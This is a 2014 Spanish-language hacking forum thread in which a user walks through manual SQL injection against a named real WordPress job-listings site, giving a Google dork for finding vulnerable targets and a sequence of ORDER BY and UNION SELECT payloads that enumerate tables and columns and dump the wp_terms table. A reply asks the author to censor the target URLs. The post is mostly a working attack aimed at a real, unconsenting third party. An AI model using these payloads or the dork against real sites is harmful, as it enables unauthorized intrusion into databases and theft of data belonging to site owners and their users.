comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Exploit Career jobs wordpress[SQLi]

  • 1 Respuestas
  • 1799 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado OswireW0rding

  • *
  • Underc0der
  • Mensajes: 15
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
  • Skype: pipe.oswire
« en: Marzo 10, 2014, 03:23:19 pm »
Hola amigos y lectores de este post, les explicare cómo explotar una Base de datos Manualmente en servidores WordPress, otra cosá no les servira usar Havij por qué no inyectara ni sacara la Base de Datos(BD), okey comenzemos.

Dork: inurl:career-details-/?jobid=

Primeramente todos se preguntarán.

¿Qué es SQLi?

La vulnerabilidad SQLi se conoce y es la más famosa desde los comienzo del internet es conocida como un "Hueco de Seguridad" muy peligroso para el administrador ya qué la página web puede tener datos importantes o Tarjetas de creditos estó a pasado y no es una leyenda estó a pasado al sacar la base de datos nos envian consultas qué nosotros podemos verlas al sacar la base de datos este error de programación es culpa del programador web que por que le pagaran mucho no programe bien la web la dejo a medias también a veces los programadores serian nuevos en esto y algunos perezosos, también se conocen otras vulnerabilidades como las siguientes.

- LFI( LIFE FILE INCLUSIÓN)
-RFI(REMOTE FILE INCLUSIÓN)
-CSRF(CROSS SITE REQUEST FORGERY)
-XSS(CROSS SITE SCRIPTING)
-RCE (REMOTE CODE EXECUTE)(REMOTE COMMAND EXECUTION)
-JFI (JPG FILE INCLUSIÓN)
-LDAP (LIGHTWEIGHT DIRECTORY ACCESS PROTOCOL)(Acessos a directorios)

Después en otros post les explicare estas vulnerabilidades, bueno vamos a lo qué venimos.

Como verán yo ya tengo mi web victima y es la siguiente:

Url:

Código: You are not allowed to view links. Register or Login
http://pragmasys.in/career-details-2/?jobid=7


Okey entonces comenzaremos las Columnas con "order by --" claro sin las comillas para esto necesitariamos el complemento HackBar al final del post se los pasaré. Okey otra cosa a veces nos saldra Unkown Column, a veces nos aparecerá errores y aveces nos saldrá nada ya qué es normal, okey entonces comenzemos, colocaremos order by 30-- haber qué es lo que nos aparecera, otra cosa cuando sea la columna indicada nos aparecera la página comun y corriente como estaba.

Okey entonces colocaremos lo siguiente:

Url:

Código: You are not allowed to view links. Register or Login
http://pragmasys.in/career-details-2/?jobid=7 order by 30--


Error ahora probaremos con order by 5--

Url:

Código: You are not allowed to view links. Register or Login
http://pragmasys.in/career-details-2/?jobid=7 order by 5--
Foto:



Como vemos igúal nos da error significa que aún está no es la columa ahora probemos con order by 4--

Url:

Código: You are not allowed to view links. Register or Login
http://pragmasys.in/career-details-2/?jobid=7 order by 4--


Okey y como verán esta es la columna !!, okey entonces ahora haremos lo siguiente para comenzar a sacar la BD(BASE DE DATOS) colocaremos "UNION SELECT 1,2,3,4--" claro sin las comillas antes de todo también es obligatorio cuando vayamos a sacar una base de datos manualmente colocar un signo menos "-" sin las comillas antes del php?id=-2 es un ejemplo y si no lo pondremos nos saldria error okey entonces quedaría así.

Url:

Código: You are not allowed to view links. Register or Login
http://pragmasys.in/career-details-2/?jobid=-7 UNION SELECT 1,2,3,4--
Foto:



Okey y como vemos nos aparecero dos números eso es normal no es ningún error y algunos se preguntaran esto.

¿Cuál número elegiremos?

Elegiremos el número qué está mas subrayado de color negro osea el negro a veces nos aparecerá más de un número subrayado eso es normal elegiremos cualquier de esos números subrayados solo uno, okey entonces ahora pondremos lo siguiente borraremos el número "2" y pondremos lo siguiente.

Url:

Código: You are not allowed to view links. Register or Login
http://pragmasys.in/career-details-2/?jobid=-7 UNION SELECT 1,group_concat(0x3c62723e,table_name),3,4 from information_schema.tables where table_schema=database()--
Foto:



Y como ven esa es la base de datos algunos se preguntaran algunos no por qué no les interesara.

¿Donde salio este número 3c62723?

Realmente ese número es el código de HTML <br> para separar los parrafos no están importante pero saldrá más ordenado , está encryptado, ¿y comó lo encrypte? muy facil vamos a la barra de HackBar donde dice Encoding >> Hex Encoding >> String to 00ff00ff y otra cosa ese 0x no significa nada pero es importante ponerlo.

Foto:



Okey ya haber sacado la base de datos colocaremos lo siguiente para sacar las columnas otra cosa yo seleccionare la columna wp_terms, la verdad el administrador de la web ha estado muy atento a la web y ha borrado la base de datos de los usuarios, bueno entonces nos quedaría así.

Url:

Código: You are not allowed to view links. Register or Login
http://pragmasys.in/career-details-2/?jobid=-7 UNION SELECT 1,group_concat(0x3c62723e,column_name),3,4 from information_schema.columns where table_name=0x77705f7465726d73--
Foto:



Y esas serían las columnas, entonces de nuevo se estarían preguntando, ¿de donse salío ese 77705f7465726d73?, púes como les escirbir ahora es el nombre de la colúmna pero encryptado es el mismo metodo como encrypte el código <br> no hay nada de diferencia, okey yo seleccionare todas las colúmnas y nos quedaría así.

Url:

Código: You are not allowed to view links. Register or Login
http://pragmasys.in/career-details-2/?jobid=-7 UNION SELECT 1,group_concat(0x3c62723e,term_id,0x3d,name,0x3d,slug,0x3d,term_group),3,4 from wp_terms--



Okey y como verán esas serán las columnas otra cosa también se preguntaran para que es ese ¿0x3d? ese 0x3d es para que no nos salga error al sacar las columnas y también se preguntaran como desencrypto el nombre de la tabla de la ¿columna? muy facil vamos a:

Encoding >>  HEX Encoding >> HEX to Characters

Foto:



Bueno espero qué hayan entendido mis lectores ! y en mi próximo post será una sorpresa más grande !, adios!.
Creditos Veneno por la página web.


« Última modificación: Marzo 10, 2014, 03:30:20 pm por OswireW0rding »
~ Blog ~
You are not allowed to view links. Register or Login

~Piensa en lo qué haces más no piensa en lo que te hacen ~

Desconectado .:UND3R:.

  • *
  • Underc0der
  • Mensajes: 226
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #1 en: Marzo 12, 2014, 10:39:40 pm »
Sabiendo que under0de es orientado al hacking ético podrías eliminar o censurar las direcciones web, saludos y buen tutorial

 

¿Te gustó el post? COMPARTILO!



SQLI tutorial pour débutants ( newbie) ecrite par *..::Key-m0rt::..*

Iniciado por ..::key-m0rt::..

Respuestas: 0
Vistas: 1610
Último mensaje Marzo 23, 2010, 12:38:21 pm
por ..::key-m0rt::..
LFI+SQLI [Incluyendo ficheros a travez de valores enteros]

Iniciado por q3rv0

Respuestas: 4
Vistas: 1642
Último mensaje Julio 24, 2013, 01:43:36 pm
por M5f3r0
[Video] Jugando al JuAckEr pt 1. [No es tutorial][SQLi+Deface]

Iniciado por Xt3mP

Respuestas: 0
Vistas: 1413
Último mensaje Julio 21, 2010, 07:43:44 pm
por Xt3mP
Métodos para bypassear un WAF en Inyección SQLi

Iniciado por M5f3r0

Respuestas: 6
Vistas: 3003
Último mensaje Agosto 05, 2013, 01:24:32 pm
por Mr. Foster
Inyección SQLi Manual Metodo (POST)

Iniciado por OswireW0rding

Respuestas: 3
Vistas: 3318
Último mensaje Marzo 16, 2014, 11:59:48 pm
por Snifer